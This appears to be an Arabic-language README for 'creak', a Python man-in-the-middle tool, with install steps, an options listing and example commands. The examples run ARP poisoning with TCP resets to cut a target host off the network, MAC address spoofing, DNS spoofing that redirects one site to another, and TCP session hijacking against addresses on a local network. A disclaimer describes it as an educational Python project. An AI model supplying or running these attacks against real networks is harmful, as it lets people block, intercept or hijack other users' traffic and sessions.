
تسميم، إعادة تعيين، تزوير، إعادة توجيه سكربت MITM
يقوم ببعض أشهر هجمات MITM على عناوين مستهدفة موجودة في شبكة محلية. من بينها، منع قدرات التصفح والتنزيل لمضيف مستهدف في الشبكة المحلية عن طريق تنفيذ هجوم تسمم ARP وإرسال حزم TCP لإعادة التعيين لكل طلب يتم إرساله إلى جهاز التوجيه. وُلد كمشروع تعليمي لتعلم لغة بايثون، وأتبرأ من أي مسؤولية عن أي إساءة استخدام، بما في ذلك الاستخدام الخبيث أو غير القانوني لهذا الكود.
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
أو ببساطة استنسخ المستودع وشغّل creak.py بعد تثبيت جميع المتطلبات:
$ git clone https://github.com/codepr/creak.git
يلزم تثبيت مكتبات pcap للتعامل مع الحزم الخام ووحدة dpkt، أما لخيارات انتحال DNS فيلزم تثبيت وحدة dnet من حزمة libdnet، لا تخلط بينها وبين وحدة pydnet (أداة تقييم الشبكة). يمكن استخدام scapy أيضًا حسب الرغبة، فقط قم بتعيين ذلك في ملف config في القسم [output] > ENGINE.
Usage: creak.py [options] dev
Options:
-h, --help show this help message and exit
-1, --sessions-scan Sessions scan mode
-2, --dns-spoof Dns spoofing
-3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
-x, --spoof Spoof mode, generate a fake MAC address to be used
during attack
-m MACADDR Mac address octet prefix (could be an entire MAC
address in the form AA:BB:CC:DD:EE:FF)
-M MANUFACTURER Manufacturer of the wireless device, for retrieving a
manufactur based prefix for MAC spoof
-s SOURCE Source ip address (e.g. a class C address like
192.168.1.150) usually the router address
-t TARGET Target ip address (e.g. a class C address like
192.168.1.150), can be specified multiple times
-p PORT Target port to shutdown
-a HOST Target host that will be redirect while navigating on
target machine
-r REDIR Target redirection that will be fetched instead of host
on the target machine
-v, --verbose Verbose output mode
-d, --dotted Dotted output mode
الاستخدام الأساسي: منع كل حركة المرور إلى المضيف المستهدف
$ python creak.py -t 192.168.1.30 wlan0
تعيين بوابة مختلفة:
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
تعيين عنوان MAC مختلف للجهاز:
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
انتحال عنوان MAC عن طريق إنشاء عنوان وهمي:
$ python creak.py -x -t 192.168.1.30 wlan0
انتحال عنوان MAC عن طريق إنشاء عنوان يعتمد على الشركة المصنعة (مثال Xeros):
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
انتحال DNS باستخدام عنوان MAC وهمي، إعادة توجيه ab.xy إلى cd.xz (مثال localhost):
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
منع عدة مضيفين في الشبكة الفرعية:
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0
انظر ملف CHANGELOG.
Scapy (تم البدء)انظر ملف LICENSE للحصول على حقوق الترخيص والقيود (GNU v3).